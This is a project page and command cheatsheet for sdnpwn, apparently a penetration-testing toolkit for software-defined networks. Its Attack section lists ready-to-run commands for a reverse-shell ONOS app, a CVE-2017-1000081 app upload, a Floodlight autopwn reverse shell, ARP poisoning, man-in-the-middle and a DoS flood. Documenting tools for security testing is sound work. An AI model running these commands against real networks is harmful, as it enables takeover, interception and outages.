Get sdnpwn

The latest version of sdnpwn can be found on Github.

Now available on BlackArch Linux!

Getting Started

The basic usage of sdnpwn is like so:

./sdnpwn.py <module name> <options>

An article introducing sdnpwn and it’s basic usage can be found here.

Module Cheatsheet

Functionality in sdnpwn is separated into different modules. Each module is responsible for a particular attack or action. See below for example usage of each module.

Reconnaissance

  • arpmon 
    ./sdnpwn.py arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0 
./sdnpwn.py arpmon -i eth0 -m map #Map MAC addresses to IP addresses
  • sdn-detect 
    ./sdnpwn.py sdn-detect #Test using default gateway with ARP traffic
./sdnpwn.py sdn-detect -t 192.168.0.29 -m icmp #Test using host 192.168.0.29 using ICMP traffic
./sdnpwn.py sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.
  • controller-detect 
    ./sdnpwn.py controller-detect -i eth0 --lldp #Test usign observed LLDP messages at interface eth0
./sdnpwn.py controller-detect -t 192.168.0.3 #Test NB Inter. of controller at 192.168.0.3
  • of-scan 
    ./sdnpwn.py of-scan -t 192.168.1.1 #Scan default ports 6633 and 6653 for OpenFlow service
./sdnpwn.py of-scan -t 192.168.1.1 -p 1000-10000 #Scan port range for OpenFlow service

Management

  • help 
    ./sdnpwn.py help #Print sdnpwn help
  • mods 
    ./sdnpwn.py mods #Print a list of all executable modules
./sdnpwn.py mods -s lfa #Search modules for a module with "lfa" in it's name
./sdnpwn.py mods -n new-mod #Create a new module named "new-mod"
./sdnpwn.py mods -r new-mod #Remove module named "new-mod"
  • info 
    ./sdnpwn.py info test-mod #Print information for module named "test-mod"
  • system 
    ./sdnpwn.py system ifconfig #Run ifconfig command on the system

Attack

  • lfa-relay 
    ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1
./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \
 --tunnel-local 192.168.70.1 --tunnel-remote 192.168.70.2 #Relay LLDP frames through a remote tunnel
  • lfa-scapy 
    ./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1
./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 --script mitm.py #Pass relayed traffic through a custom script
  • lldp-replay 
    ./sdnpwn.py lldp-replay -i eth0 -w lldpcap.cap #Capture LLDP frame to file lldpcap.cap
./sdnpwn.py lldp-replay -i eth0 -r lldpcap.cap #Replay LLDP frame from file lldpcap.cap
  • host-location-hijack 
    ./sdnpwn.py host-location-hijack --iface eth0 --target 192.168.56.7 #Hijack location of 192.168.56.7
  • of-switch 
    ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf #Connect to controller at 192.168.1.1 on port 6653 using of-switch.conf configuration
./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -l 8888 #Open relay proxy on port 8888
./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -o eth0 #Output packet-out payloads to eth0
  • of-gen 
    ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --hello #Send OF Hello message to 192.168.7.8:6633 
./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 -c 1000 -d .001 --hello #Flood OF Hello messages 
./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --packet-in --xid 0 --buffer-id 0 --in-port 1 \
 --reason action --total-length 65353 --data-scapy "Ether()/IP()/TCP()" #Send arbitrary packet-in message
  • onos-app 
    ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell #Build netcat based reverse shell app from template
./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -c #Modify configuration for app before build
./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -k #Build app and keep source folder
  • onos-app-upload 
    ./sdnpwn.py onos-app-upload -t 192.168.23.100 -p 8181 -a apps/compiled_apps/securearp.oar #Exploit CVE-2017-1000081 to upload app from compiled apps folder
  • floodlight-debug-autopwn 
    ./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -l 127.0.0.1:8888 #Set up listener and get reverse shell on port 8888
./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -r #Do not set up a listener. Use this if you're using another program to listen for the shell
  • dp-arp-poison 
    ./sdnpwn.py dp-arp-poison -i eth0 -v 192.168.1.2 -t 192.168.1.3 -m de:ad:be:ef:ba:11 #Poison 192.168.1.3 in ARP cache of 192.168.1.2 with MAC of de:ad:be:ef:ba:11
  • dp-mitm 
    ./sdnpwn.py dp-mitm --iface eth0 --target1 192.168.1.2 --gateway #MITM connection from target to gateway
  • phantom-host-scan 
    ./sdnpwn.py phantom-host-scan --iface eth0 --target-ip 192.168.1.2 --ports 22,23 --phantom-ip 192.168.1.5 #Scan ports 22 and 23 using the phantom host scan
  • phantom-storm 
    ./sdnpwn.py phantom-storm --iface eth0 --target 192.168.1.0/24 --phantom-ip 192.168.1.5 --packets 1000 #Launch phantom storm DoS attack against network 192.168.1.0/24 with 1000 packets